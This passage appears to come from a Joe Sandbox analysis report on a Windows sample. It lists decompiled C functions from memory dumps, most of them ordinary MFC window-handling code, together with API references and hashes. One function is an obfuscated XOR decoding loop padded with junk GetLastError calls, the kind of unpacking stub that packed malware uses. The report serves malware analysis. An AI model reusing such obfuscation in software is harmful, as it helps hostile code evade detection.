				 *(__ecx + 0x44) =  *(_t125 + 0xc);
				 *(__ecx + 0x48) =  *(_t125 + 0x10);
				E0041A41D(_t125 - 0x24, __eflags);
				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
				_t76 = __ecx + 0x4c;
				_t76->x =  *(__ecx + 0x44);
				_t76->y =  *(__ecx + 0x48);
				LPtoDP( *(_t125 - 0x1c), _t76, 1);
				_t78 =  *(_t125 + 0x14);
				_t97 = __ecx + 0x54;
				_t97->x =  *_t78;
				_t97->y = _t78[1];
				LPtoDP( *(_t125 - 0x1c), _t97, 1);
				_t81 =  *(_t125 + 0x18);
				_t82 = __ecx + 0x5c;
				_t82->x =  *_t81;
				_t82->y = _t81[1];
				LPtoDP( *(_t125 - 0x1c), _t82, 1);
				_t84 =  *(__ecx + 0x50);
				if(_t84 < 0) {
					 *(__ecx + 0x50) =  ~_t84;
				}
				_t85 =  *(_t123 + 0x58);
				if(_t85 < 0) {
					 *(_t123 + 0x58) =  ~_t85;
				}
				_t86 =  *(_t123 + 0x60);
				if(_t86 < 0) {
					 *(_t123 + 0x60) =  ~_t86;
				}
				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
				_t87 = E0041A48F(_t125 - 0x24);
				_t108 = 0xa;
				if(_t97->x == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x4c) / _t108;
					_t97->x = _t87;
				}
				if( *(_t123 + 0x58) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x50) / _t108;
					 *(_t123 + 0x58) = _t87;
				}
				if( *(_t123 + 0x5c) == 0) {
					asm("cdq");
					_t87 = _t97->x / _t108;
					 *(_t123 + 0x5c) = _t87;
				}
				if( *(_t123 + 0x60) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x58) / _t108;
					 *(_t123 + 0x60) = _t87;
				}
				if( *(_t123 + 0x1c) != 0) {
					E0041B2F1(_t123);
					_t87 =  *(_t125 - 0x10);
					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t87;
			}

0x0041aea1
0x0041aeab
0x0041aeae
0x0041aeb6
0x0041aebc
0x0041aec2
0x0041aec8
0x0041aecb
0x0041aed3
0x0041aeda
0x0041aee8
0x0041aef1
0x0041aef6
0x0041aef9
0x0041aefb
0x0041aefe
0x0041af0c
0x0041af0e
0x0041af11
0x0041af13
0x0041af1d
0x0041af24
0x0041af26
0x0041af29
0x0041af2b
0x0041af30
0x0041af34
0x0041af34
0x0041af37
0x0041af3c
0x0041af40
0x0041af40
0x0041af43
0x0041af48
0x0041af4c
0x0041af4c
0x0041af4f
0x0041af56
0x0041af60
0x0041af61
0x0041af68
0x0041af69
0x0041af6b
0x0041af6b
0x0041af71
0x0041af78
0x0041af79
0x0041af7b
0x0041af7b
0x0041af83
0x0041af89
0x0041af8a
0x0041af8c
0x0041af8c
0x0041af92
0x0041af97
0x0041af98
0x0041af9a
0x0041af9a
0x0041afa0
0x0041afa4
0x0041afa9
0x0041afaf
0x0041afb7
0x0041afb7
0x0041afaf
0x0041afc3
0x0041afcb

APIs

__EH_prolog.LIBCMT ref: 0041AEA1

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8

LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401163, Relevance: 7.6, APIs: 6, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				char _t49;
				intOrPtr _t58;
				intOrPtr _t90;
				intOrPtr _t107;
				void* _t115;

				_v8 =  *_a12;
				_v12 =  *((intOrPtr*)(_a12 + 1));
				_v16 = 0;
				while(_v16 < _a8) {
					asm("cdq");
					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
					asm("cdq");
					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
					_t58 =  *0x437cc0; // 0x2321c90
					_t107 =  *0x437cc0; // 0x2321c90
					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
					_t115 = _t115 + 8;
					asm("cdq");
					_v20 = 0;
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					_t90 =  *0x437cc0; // 0x2321c90
					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
					_v16 = _v16 + 1;
				}
				_t49 = _v8;
				 *_a12 = _t49;
				 *((char*)(_a12 + 1)) = _v12;
				return _t49;
			}

0x0040116f
0x00401178
0x0040117b
0x0040118d
0x004011a4
0x004011ac
0x004011cf
0x004011d7
0x004011e3
0x004011f4
0x004011fd
0x00401202
0x00401230
0x00401238
0x0040123b
0x00401241
0x00401247
0x0040124d
0x00401253
0x00401259
0x0040126e
0x0040127f
0x0040118a
0x0040118a
0x00401289
0x0040128c
0x00401294
0x0040129b

APIs

GetLastError.KERNEL32 ref: 0040123B
GetLastError.KERNEL32 ref: 00401241
GetLastError.KERNEL32 ref: 00401247
GetLastError.KERNEL32 ref: 0040124D
GetLastError.KERNEL32 ref: 00401253
GetLastError.KERNEL32 ref: 00401259

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415DE6, Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E00406520(E00429E94, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E00412F9D(_t64 - 0x38);
				E0041331F(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E00413DB2(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

0x00415deb
0x00415dfa
0x00415dfd
0x00415e05
0x00415e0f
0x00415e18
0x00415e1c
0x00415e23
0x00415e24
0x00415e30
0x00415e36
0x00415e37
0x00415e41
0x00415e6d
0x00415e6f
0x00415e74
0x00415e89
0x00415eaa
0x00415eaa
0x00415e8b
0x00415e93
0x00415e99
0x00000000
0x00000000
0x00415e99
0x00415e89
0x00415eb3
0x00415eb3
0x00415e6d
0x00415ec1
0x00415ec3
0x00415ecb
0x00415ecc
0x00415ed3
0x00415ed6
0x00415ee0
0x00415ee8

APIs

__EH_prolog.LIBCMT ref: 00415DEB
GetTopWindow.USER32(?), ref: 00415E12
GetDlgCtrlID.USER32 ref: 00415E27
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00415E80
GetWindow.USER32(00000000,00000002), ref: 00415EBB

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction ID: a7ff307ea5fd4ed9b42493fc3e47649cc0ac06b73cf1fa4f536db176ac1b2ba5
Opcode Fuzzy Hash: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction Fuzzy Hash: 5331A272D00614EACB21EBA5DC859EFBB74EF95304F60022BF411E2295E7784E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004105C2, Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004105C2(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E00406520(E0042A8D0, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x436980; // 0x436994
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E00413740(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E00416A77(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E00416AEC(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E00416AEC(_t83 - 0x10);
							} else {
								E00416A77(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

0x004105c2
0x004105c7
0x004105cc
0x004105cd
0x004105ce
0x004105dc
0x004105df
0x0041068f
0x00410695
0x004105e5
0x004105e5
0x004105ea
0x00000000
0x004105f0
0x004105f0
0x004105f6
0x004105ff
0x00410607
0x00410630
0x00410641
0x00410632
0x00410635
0x00410635
0x0041064d
0x00410680
0x00410680
0x00410687
0x0041068c
0x00000000
0x0041064f
0x00410658
0x00410676
0x004106b3
0x004106bf
0x004106c4
0x004106cb
0x00410678
0x0041067b
0x00000000
0x0041067b
0x00410676
0x0041064d
0x004105ea
0x004106a3
0x004106ab

APIs

__EH_prolog.LIBCMT ref: 004105C7
GetParent.USER32(?), ref: 00410604
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0041062C
GetParent.USER32(?), ref: 00410655
SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00410672

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction ID: 07ce01a875e9ee4c694f432b72042445b87f7b3637ebdeb0f8d3e1dd1834bd9a
Opcode Fuzzy Hash: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction Fuzzy Hash: 13318170600216ABCF14EFA1DC45AEFB774FF40358F11452AE421A71D1DB78D995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004150E7, Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						E0041A2F1(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

0x004150ef
0x004150f5
0x004150fd
0x00415166
0x00415109
0x0041510f
0x00415111
0x00415114
0x00415114
0x00415116
0x0041511a
0x00000000
0x00000000
0x00415121
0x0041512d
0x0041514c
0x00415152
0x00415154
0x00415154
0x00415114
0x0041516c
0x0041516c
0x00415171
0x00000000
0x00415183
0x0041518a

APIs

IsWindowVisible.USER32(?), ref: 004150F5
GetWindow.USER32(?,00000005), ref: 00415114
GetWindowRect.USER32 ref: 00415121

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
ScrollWindow.USER32 ref: 00415166

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction ID: 05942f404d56e3bc249559bb1a558a0c6e37b23f98baaac5964d945a6837c05d
Opcode Fuzzy Hash: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction Fuzzy Hash: 03216A31A00609FFCF229F54DC48EFF7BB9EB88744B44452AF90596261D774AC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420B23, Relevance: 7.6, APIs: 5, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _t21;
				signed char _t22;
				signed int _t40;
				intOrPtr* _t44;
				void* _t45;
				struct HWND__* _t47;

				_t45 = __ebp;
				_t40 = _a4;
				_t44 = __ecx;
				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
					E004166CE(__ecx, 0);
					return SetFocus(0);
				}
				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
				if(_t21 != 0) {
					return _t21;
				} else {
					if(_t40 != 0) {
						_t22 =  *(_t44 + 0x24);
						_push(_t45);
						if((_t22 & 0x00000080) != 0) {
							 *(_t44 + 0x24) = _t22 & 0x0000007f;
							 *((intOrPtr*)( *_t44 + 0x8c))();
							_t47 =  *(_t44 + 0x1c);
							if(GetActiveWindow() == _t47) {
								SendMessageA(_t47, 6, 1, 0);
							}
						}
						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
							 *((intOrPtr*)( *_t44 + 0x88))();
						}
					}
					asm("sbb edi, edi");
					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
				}
			}

0x00420b23
0x00420b26
0x00420b2c
0x00420b30
0x00420b39
0x00000000
0x00420b3f
0x00420b54
0x00420b5b
0x00420bd6
0x00420b5d
0x00420b5f
0x00420b79
0x00420b84
0x00420b85
0x00420b8b
0x00420b90
0x00420b96
0x00420ba1
0x00420baa
0x00420baa
0x00420ba1
0x00420bb1
0x00420bbf
0x00420bbf
0x00420b61
0x00420b67
0x00420b6b
0x00420b71
0x00420b71
0x00420b67
0x00420bc3
0x00000000
0x00420bce

APIs

SetFocus.USER32(00000000,00000000), ref: 00420B3F
GetParent.USER32(?), ref: 00420B4D
GetActiveWindow.USER32 ref: 00420B99
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00420BAA
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420BBF

Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction ID: b973cea33cd40a65d929727e5f9c9eb7024a6c5d1ea90242926d9fabef0d3f3f
Opcode Fuzzy Hash: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction Fuzzy Hash: E91106313003105FD7305FA4EC84B1BBBE9AF59B08F500A2EF596AA2D2CB74B841870C

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD9, Relevance: 7.6, APIs: 5, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00420BD9(void* __ecx, signed int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t32;
				void* _t33;
				struct HWND__* _t34;

				_t33 = __ecx;
				if((E00416528(__ecx) & 0x40000000) == 0) {
					_t32 = E00414DCC(__ecx);
				} else {
					_t32 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E004166B3(_t32);
					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t34 = _t20;
					if(_t34 == 0) {
						break;
					}
					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
						SendMessageA(_t34, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t34);
				}
				return _t20;
			}

0x00420bdd
0x00420be9
0x00420bf6
0x00420beb
0x00420beb
0x00420beb
0x00420c03
0x00420c07
0x00420c15
0x00420c43
0x00420c1f
0x00420c1f
0x00420c2f
0x00420c31
0x00420c31
0x00420c15
0x00420c45
0x00420c53
0x00420c54
0x00420c54
0x00420c56
0x00420c5a
0x00000000
0x00000000
0x00420c67
0x00420c75
0x00420c75
0x00420c77
0x00420c79
0x00420c79
0x00420c80

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420C2F
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00420C43
GetDesktopWindow.USER32 ref: 00420C47
GetWindow.USER32(00000000), ref: 00420C54
SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 00420C75

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction ID: c41997b72d8c96214e5640ecb70f441624ebe3089d32e1eab02e12923e6e0a2e
Opcode Fuzzy Hash: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction Fuzzy Hash: AA113A3134072573E3355722AC06F2FBAC89F41B94F95432AB6402A2D3CF59DC42839D

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				int _t20;
				unsigned int _t39;
				intOrPtr _t45;

				_v8 = __ecx;
				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
				if(_t45 != 0 && _a8 != 0) {
					_t39 = _a8 >> 0x10;
					if(_t39 != 0) {
						_t20 =  *(_t45 + 0xb0);
						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
						}
					}
				}
				return 0;
			}

0x00421546
0x0042154e
0x00421553
0x00421567
0x0042156d
0x00421573
0x0042157e
0x0042159e
0x004215ad
0x004215c3
0x004215cc
0x004215f0
0x004215f7
0x0042157e
0x0042156d
0x004215fc

APIs

GlobalGetAtomNameA.KERNEL32 ref: 0042159E
GlobalAddAtomA.KERNEL32 ref: 004215AD
GlobalGetAtomNameA.KERNEL32 ref: 004215C3
GlobalAddAtomA.KERNEL32 ref: 004215CC
SendMessageA.USER32(?,000003E4,?,?), ref: 004215F0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction ID: ddc056c18c8f30134593d029485027bb11089ec59ad006056310b0d46243fd91
Opcode Fuzzy Hash: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction Fuzzy Hash: EB119475600319AADB20EB68DC44AEBB3BCEB54700F404456E59697190E7B8EAC1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004142C3, Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004142C3() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E00406520(E00429E28, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
						E00425F56(1);
						 *(_t40 - 4) = 0;
